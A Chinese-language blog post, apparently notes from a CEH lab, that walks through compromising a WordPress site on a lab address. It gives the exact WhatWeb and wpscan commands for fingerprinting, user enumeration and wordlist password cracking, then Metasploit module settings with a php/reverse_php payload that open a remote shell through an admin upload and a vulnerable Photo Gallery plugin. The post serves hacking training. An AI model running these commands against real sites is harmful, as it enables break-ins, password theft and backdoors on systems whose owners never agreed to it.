WordPress 相關破解

WordPress 相關破解


因為要破解駭客友善部落格系統 WordPress,所以首先要確認目標網站是否 WordPress

透過工具 WhatWeb 進行目標網站掃描

指令 : whatweb http://10.10.10.16:8080/ceh

掃描後發現目標網站是採用 WordPress 4.9.15 建置



直接開始使用 WordPress 殺人放火好工具 wpscan 進行列舉與使用者列表

指令 : wpscan --url http://10.10.10.16:8080/ceh/ -e u

參數 -e 為列舉,參數 u 為使用者列表



三組使用者帳號列舉如下圖 admin / cehuser1 / cehuser2



後續直接透過同一個工具破解密碼

指令 : wpscan --url http://10.10.10.16/ceh/ -P /usr/share/worldlists/nmap.lst

順利破解其中一個使用者 cehuser1,密碼為 green



只要攻破 WordPress 網站後即可利用網頁漏洞專用工具 Metasploit 進行下一步攻擊

進入 msfconsole (每次啟動歡迎畫面都是隨機的喔)



接著可以使用 wp_admin_shell_upload 模組進行安裝後門,不過要先輸入目標參數

可以透過 show info 來查看要輸入的相關參數,可以看到基本的參數如下

set RHOST : 目標主機 IP or 名稱

set RPORT : 目標主機使用的 Port

set TARGETURI : 目標主機網址列使用的 URI

set USERNAME : 要使用的使用者帳號

set PASSWORD : 上述使用者的密碼

set PALOAD : 設定要使用的 payload 檔案名稱




我們一一輸入如下的參數值

set RHOST 10.10.10.16

set RPORT 8080

set TARGETURI /ceh

set USERNAME admin

set PASSWORD qwerty@123

set PAYLOAD php/reverse_php




接著輸入 exploit 就成功進入 WordPress 對方主機命令字元了

可以看到 whoami / hostname / net user 都直接列出來了





另外一個是透過 WordPress 安裝的外掛進行入侵

如下可以看到該 WordPress 有安裝 Photo Gallery 1.2.5 外掛套件



或是透過 wpscan 時亦可看到套件名稱與版本資訊如下

指令 : wpscan --url http://10.10.10.16:8080/ceh




進入 msfconsole 開始進行進階入侵 (這次的登入畫面是一個忍者)



這次要使用的外掛漏洞,模組的路徑如下

exploit/unix/webapp/wp_photo_gallery_unrestricted_file_upload

指令 : use exploit/unix/webapp/wp_photo_gallery_unrestricted_file_upload

輸入後沒有作用,這次因為要先給參數



一樣給予相關參數如下

set RHOST 10.10.10.16

set RPORT 8080

set TARGETURI /ceh

set USERNAME cehuser1

set PASSWORD green

set PAYLOAD php/reverse_php



進行 exploit,一樣又進入目標主機的 command line 了

whoami / hostname / net user 指令結果輸出如下




留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

Challenge 0 - Secura(1)

Challenge 8 - Poseidon(0)